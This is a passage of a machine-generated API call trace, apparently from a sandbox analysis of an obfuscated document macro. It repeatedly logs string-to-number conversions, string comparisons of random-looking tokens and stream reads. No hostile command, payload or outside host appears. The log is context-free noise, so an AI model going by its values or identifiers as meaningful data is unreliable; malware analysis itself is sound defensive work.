pfltOut=0x40e5418d) returned 0x0 [0059.522] VarI4FromStr (in: strIn="1746939796", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.522] CRetailMalloc_Realloc () returned 0x88863e0 [0059.522] VarI4FromStr (in: strIn="1701220460", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.522] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="EhJxS", cchCount1=-1, lpString2="QpJ1uw7", cchCount2=-1) returned 1 [0059.522] VarI4FromStr (in: strIn="26195", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.522] VarI4FromStr (in: strIn="1548576002", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.522] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="EhJxS", cchCount1=-1, lpString2="QpJ1uw7", cchCount2=-1) returned 1 [0059.522] VarI4FromStr (in: strIn="26195", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.523] VarI4FromStr (in: strIn="32490", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.523] VarR8FromStr (in: strIn="19407.357696714", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.523] VarR4FromR8 (in: dblIn=0xe480c221, pfltOut=0x40d2f3d6 | out: pfltOut=0x40d2f3d6) returned 0x0 [0059.523] VarR8FromStr (in: strIn="6005.1174089989", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.523] VarR4FromR8 (in: dblIn=0xe842288, pfltOut=0x40b7751e | out: pfltOut=0x40b7751e) returned 0x0 [0059.523] VarI4FromStr (in: strIn="32490", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.523] VarR8FromStr (in: strIn="64722.512529178", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.523] VarR4FromR8 (in: dblIn=0x66a39738, pfltOut=0x40ef9a50 | out: pfltOut=0x40ef9a50) returned 0x0 [0059.523] VarI4FromStr (in: strIn="10787", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.524] VarI4FromStr (in: strIn="10787", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.524] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="EwqPK5Nx" | out: _Dst="EwqPK5Nx") returned 0x0 [0059.524] VarI4FromStr (in: strIn="28050", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.524] VarR8FromStr (in: strIn="31814.861274452", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.524] VarR4FromR8 (in: dblIn=0x1f1ee10e, pfltOut=0x40df11b7 | out: pfltOut=0x40df11b7) returned 0x0 [0059.524] VarI4FromStr (in: strIn="14469", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.524] VarI4FromStr (in: strIn="28050", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.524] VarI4FromStr (in: strIn="15228", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.524] VarI4FromStr (in: strIn="28050", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.524] VarR8FromStr (in: strIn="32193.961365567", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.525] VarR4FromR8 (in: dblIn=0x87037171, pfltOut=0x40df707d | out: pfltOut=0x40df707d) returned 0x0 [0059.525] CRetailMalloc_Realloc () returned 0x88863e0 [0059.525] VarR8FromStr (in: strIn="42487.775397806", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.525] VarR4FromR8 (in: dblIn=0xd00f0f45, pfltOut=0x40e4bef8 | out: pfltOut=0x40e4bef8) returned 0x0 [0059.525] VarI4FromStr (in: strIn="12192", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.525] VarI4FromStr (in: strIn="19910", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.525] VarI4FromStr (in: strIn="20429", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.525] VarI4FromStr (in: strIn="643755544", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.526] VarI4FromStr (in: strIn="19910", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.526] VarR8FromStr (in: strIn="20046.418793984", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.526] VarR4FromR8 (in: dblIn=0xcd854843, pfltOut=0x40d3939a | out: pfltOut=0x40d3939a) returned 0x0 [0059.526] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="S4LYP5kj" | out: _Dst="S4LYP5kj") returned 0x0 [0059.526] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="laIYudf", cchCount1=-1, lpString2="dH2AphnQ", cchCount2=-1) returned 3 [0059.526] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="laIYudf", cchCount1=-1, lpString2="dH2AphnQ", cchCount2=-1) returned 3 [0059.526] VarR8FromStr (in: strIn="35429.739502051", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.526] VarR4FromR8 (in: dblIn=0xaa00348c, pfltOut=0x40e14cb7 | out: pfltOut=0x40e14cb7) returned 0x0 [0059.526] CExposedStream::Read () returned 0x0 [0059.526] CExposedStream::Read () returned 0x0 [0059.526] VarI4FromStr (in: strIn="32716", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.527] VarI4FromStr (in: strIn="19228", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.527] VarR8FromStr (in: strIn="4551.3301350205", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.527] VarR4FromR8 (in: dblIn=0x83ba8c50, pfltOut=0x40b1c754 | out: pfltOut=0x40b1c754) returned 0x0 [0059.527] VarI4FromStr (in: strIn="23307", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.527] VarI4FromStr (in: strIn="28192", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.527] VarI4FromStr (in: strIn="32107", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.527] VarI4FromStr (in: strIn="23307", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.527] VarI4FromStr (in: strIn="28192", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.527] VarI4FromStr (in: strIn="10127", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.527] VarI4FromStr (in: strIn="23307", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.527] VarI4FromStr (in: strIn="28192", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.528] VarR8FromStr (in: strIn="3166.1521065295", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.528] VarR4FromR8 (in: dblIn=0xe0e8336c, pfltOut=0x40a8bc4d | out: pfltOut=0x40a8bc4d) returned 0x0 [0059.528] VarI4FromStr (in: strIn="10127", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.528] VarI4FromStr (in: strIn="28192", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.528] VarI4FromStr (in: strIn="27934", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.528] VarR8FromStr (in: strIn="23881.654596544", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.528] VarR4FromR8 (in: dblIn=0xe4e8e723, pfltOut=0x40d75269 | out: pfltOut=0x40d75269) returned 0x0 [0059.529] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="EwqPK5Nx" | out: _Dst="EwqPK5Nx") returned 0x0 [0059.529] VarR8FromStr (in: strIn="43334.512500505", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.529] VarR4FromR8 (in: dblIn=0x66677585, pfltOut=0x40e528d0 | out: pfltOut=0x40e528d0) returned 0x0 [0059.529] VarR8FromStr (in: strIn="7485.9925272176", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.529] VarR4FromR8 (in: dblIn=0x164383fb, pfltOut=0x40bd3dfe | out: pfltOut=0x40bd3dfe) returned 0x0 [0059.529] VarR8FromStr (in: strIn="53636.996719285", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.529] VarR4FromR8 (in: dblIn=0xe51fd78c, pfltOut=0x40ea309f | out: pfltOut=0x40ea309f) returned 0x0 [0059.529] CRetailMalloc_Realloc () returned 0x88863e0 [0059.529] VarR8FromStr (in: strIn="59956.798101598", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.529] VarR4FromR8 (in: dblIn=0x8a0c5cc9, pfltOut=0x40ed4699 | out: pfltOut=0x40ed4699) returned 0x0 [0059.529] VarI4FromStr (in: strIn="10338", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.529] VarI4FromStr (in: strIn="13681", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.529] VarI4FromStr (in: strIn="13683", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.530] VarI4FromStr (in: strIn="23832", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.530] VarI4FromStr (in: strIn="13681", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.530] VarI4FromStr (in: strIn="13683", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.530] VarI4FromStr (in: strIn="20790", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.530] VarR8FromStr (in: strIn="27459.414920275", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.530] VarR4FromR8 (in: dblIn=0x8e0dc4e5, pfltOut=0x40dad0da | out: pfltOut=0x40dad0da) returned 0x0 [0059.530] VarR8FromStr (in: strIn="27459.414920275", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.530] VarR4FromR8 (in: dblIn=0x8e0dc4e5, pfltOut=0x40dad0da | out: pfltOut=0x40dad0da) returned 0x0 [0059.530] VarI4FromStr (in: strIn="13681", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.530] VarI4FromStr (in: strIn="13683", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.530] VarR8FromStr (in: strIn="30073.24473594", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.530] VarR4FromR8 (in: dblIn=0xa9c0ee9d, pfltOut=0x40dd5e4f | out: pfltOut=0x40dd5e4f) returned 0x0 [0059.531] VarI4FromStr (in: strIn="13681", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.531] VarI4FromStr (in: strIn="13683", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.531] VarI4FromStr (in: strIn="25027", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.531] VarI4FromStr (in: strIn="13681", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.531] VarI4FromStr (in: strIn="13683", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.531] VarI4FromStr (in: strIn="14563", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.531] VarI4FromStr (in: strIn="14565", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.531] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="OisFLmQ", cchCount1=-1, lpString2="cpjs4", cchCount2=-1) returned 3 [0059.531] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="OisFLmQ", cchCount1=-1, lpString2="cpjs4", cchCount2=-1) returned 3 [0059.532] VarI4FromStr (in: strIn="14563", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.532] VarI4FromStr (in: strIn="14565", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.532] VarI4FromStr (in: strIn="14162", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.532] VarI4FromStr (in: strIn="14162", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.532] VarR8FromStr (in: strIn="60565.096697465", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.532] VarR4FromR8 (in: dblIn=0x18254839, pfltOut=0x40ed92a3 | out: pfltOut=0x40ed92a3) returned 0x0 [0059.532] VarI4FromStr (in: strIn="14563", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.532] VarI4FromStr (in: strIn="14565", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.532] VarI4FromStr (in: strIn="22499", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.532] VarI4FromStr (in: strIn="14563", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.532] VarI4FromStr (in: strIn="14565", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.533] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="S4LYP5kj" | out: _Dst="S4LYP5kj") returned 0x0 [0059.533] VarI4FromStr (in: strIn="11440", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.533] VarR8FromStr (in: strIn="24552.445953915", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.533] VarR4FromR8 (in: dblIn=0x8a824a1d, pfltOut=0x40d7fa1c | out: pfltOut=0x40d7fa1c) returned 0x0 [0059.533] VarR8FromStr (in: strIn="24552.445953915", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.533] VarR4FromR8 (in: dblIn=0x8a824a1d, pfltOut=0x40d7fa1c | out: pfltOut=0x40d7fa1c) returned 0x0 [0059.533] CRetailMalloc_Realloc () returned 0x88863e0 [0059.533] VarI4FromStr (in: strIn="11440", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.533] VarI4FromStr (in: strIn="18438", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.533] VarR8FromStr (in: strIn="9281.2487516325", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.533] VarR4FromR8 (in: dblIn=0xd717ef35, pfltOut=0x40c2209f | out: pfltOut=0x40c2209f) returned 0x0 [0059.533] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="jkGqYDp3M", cchCount1=-1, lpString2="tcvqX1", cchCount2=-1) returned 1 [0059.534] VarI4FromStr (in: strIn="17780", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.534] VarI4FromStr (in: strIn="18438", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.534] VarR8FromStr (in: strIn="19053.617601401", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.534] VarR4FromR8 (in: dblIn=0x86c806d1, pfltOut=0x40d29b67 | out: pfltOut=0x40d29b67) returned 0x0 [0059.534] VarI4FromStr (in: strIn="28556", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.534] VarR8FromStr (in: strIn="28753.106640848", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.534] VarR4FromR8 (in: dblIn=0xd33422a5, pfltOut=0x40dc1446 | out: pfltOut=0x40dc1446) returned 0x0 [0059.534] VarI4FromStr (in: strIn="17780", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.534] VarI4FromStr (in: strIn="18438", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.534] CExposedStream::Read () returned 0x0 [0059.534] CExposedStream::Read () returned 0x0 [0059.535] VarI4FromStr (in: strIn="28556", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.535] VarI4FromStr (in: strIn="2123327876", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.535] VarR8FromStr (in: strIn="33470.542445887", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.535] VarR4FromR8 (in: dblIn=0x5bb77a10, pfltOut=0x40e057d1 | out: pfltOut=0x40e057d1) returned 0x0 [0059.535] VarR8FromStr (in: strIn="54761.970947467", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.535] VarR4FromR8 (in: dblIn=0x12006c1d, pfltOut=0x40eabd3f | out: pfltOut=0x40eabd3f) returned 0x0 [0059.535] VarI4FromStr (in: strIn="21197", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.535] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="S4LYP5kj" | out: _Dst="S4LYP5kj") returned 0x0 [0059.535] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="lPos" | out: _Dst="lPos") returned 0x0 [0059.535] strcpy_s (in: _Dst=0x75060420, _DstSize=0x100, _Src="lChar" | out: _Dst="lChar") returned 0x0 [0059.536] VarI4FromStr (in: strIn="25652", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.536] VarI4FromStr (in: strIn="2006548074", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.536] VarR8FromStr (in: strIn="21110.57778638", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.536] VarR4FromR8 (in: dblIn=0xfa73b98b, pfltOut=0x40d49da4 | out: pfltOut=0x40d49da4) returned 0x0 [0059.536] VarI4FromStr (in: strIn="25652", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.536] VarR8FromStr (in: strIn="43117.172152535", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.536] VarR4FromR8 (in: dblIn=0x82460878, pfltOut=0x40e50da5 | out: pfltOut=0x40e50da5) returned 0x0 [0059.536] VarR8FromStr (in: strIn="58691.098538884", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.536] VarR4FromR8 (in: dblIn=0x273b0485, pfltOut=0x40eca863 | out: pfltOut=0x40eca863) returned 0x0 [0059.536] CRetailMalloc_Realloc () returned 0x88863e0 [0059.536] VarI4FromStr (in: strIn="25652", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.536] VarR8FromStr (in: strIn="38281.795394922", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.537] VarR4FromR8 (in: dblIn=0x73e00d2d, pfltOut=0x40e2b139 | out: pfltOut=0x40e2b139) returned 0x0 [0059.537] VarR8FromStr (in: strIn="38281.795394922", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.537] VarR4FromR8 (in: dblIn=0x73e00d2d, pfltOut=0x40e2b139 | out: pfltOut=0x40e2b139) returned 0x0 [0059.537] VarI4FromStr (in: strIn="25652", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.537] VarR8FromStr (in: strIn="24363.486460275", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.537] VarR4FromR8 (in: dblIn=0x222a46fb, pfltOut=0x40d7cadf | out: pfltOut=0x40d7cadf) returned 0x0 [0059.537] VarR8FromStr (in: strIn="24363.486460275", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.537] VarR4FromR8 (in: dblIn=0x222a46fb, pfltOut=0x40d7cadf | out: pfltOut=0x40d7cadf) returned 0x0 [0059.537] VarI4FromStr (in: strIn="25652", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.537] VarI4FromStr (in: strIn="1417231714", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.537] VarR8FromStr (in: strIn="32538.098518771", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.537] VarR4FromR8 (in: dblIn=0x4e21acdf, pfltOut=0x40dfc686 | out: pfltOut=0x40dfc686) returned 0x0 [0059.537] VarI4FromStr (in: strIn="10507", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.538] VarI4FromStr (in: strIn="10507", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.538] VarI4FromStr (in: strIn="29172", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.538] VarI4FromStr (in: strIn="20855", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.538] VarI4FromStr (in: strIn="29172", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.538] VarI4FromStr (in: strIn="30492", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.538] VarI4FromStr (in: strIn="30492", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.538] VarR8FromStr (in: strIn="343.60919185767", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.539] VarR4FromR8 (in: dblIn=0x3ff61aea, pfltOut=0x407579bf | out: pfltOut=0x407579bf) returned 0x0 [0059.539] VarI4FromStr (in: strIn="30492", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.539] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="M70dPo", cchCount1=-1, lpString2="QDIAg6", cchCount2=-1) returned 1 [0059.539] VarR8FromStr (in: strIn="64856.714372986", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.539] VarR4FromR8 (in: dblIn=0xdc24bc81, pfltOut=0x40efab16 | out: pfltOut=0x40efab16) returned 0x0 [0059.539] VarI4FromStr (in: strIn="30492", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.539] VarR8FromStr (in: strIn="6281.2304823622", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.539] VarR4FromR8 (in: dblIn=0xe45ff4, pfltOut=0x40b8893b | out: pfltOut=0x40b8893b) returned 0x0 [0059.540] VarI4FromStr (in: strIn="30492", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.540] VarR8FromStr (in: strIn="15143.219979821", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.540] VarR4FromR8 (in: dblIn=0x284c7c7d, pfltOut=0x40cd939c | out: pfltOut=0x40cd939c) returned 0x0 [0059.540] VarR8FromStr (in: strIn="15143.219979821", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.540] VarR4FromR8 (in: dblIn=0x284c7c7d, pfltOut=0x40cd939c | out: pfltOut=0x40cd939c) returned 0x0 [0059.540] CRetailMalloc_Realloc () returned 0x88863e0 [0059.540] VarI4FromStr (in: strIn="540786116", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.541] VarI4FromStr (in: strIn="13804", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.541] VarR8FromStr (in: strIn="9181.0594207593", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.541] VarR4FromR8 (in: dblIn=0x9b1974f3, pfltOut=0x40c1ee87 | out: pfltOut=0x40c1ee87) returned 0x0 [0059.541] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="sOut" | out: _Dst="sOut") returned 0x0 [0059.541] VarR8FromStr (in: strIn="5384.5883780853", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.541] VarR4FromR8 (in: dblIn=0x9ff23a0c, pfltOut=0x40b50896 | out: pfltOut=0x40b50896) returned 0x0 [0059.541] VarR8FromStr (in: strIn="5384.5883780853", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.541] VarR4FromR8 (in: dblIn=0x9ff23a0c, pfltOut=0x40b50896 | out: pfltOut=0x40b50896) returned 0x0 [0059.541] VarR8FromStr (in: strIn="5904.8381441928", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.541] VarR4FromR8 (in: dblIn=0x909e2969, pfltOut=0x40b710d6 | out: pfltOut=0x40b710d6) returned 0x0 [0059.541] VarR8FromStr (in: strIn="57140.65096353", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.541] VarR4FromR8 (in: dblIn=0xd4b17808, pfltOut=0x40ebe694 | out: pfltOut=0x40ebe694) returned 0x0 [0059.541] VarI4FromStr (in: strIn="23946", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.542] VarI4FromStr 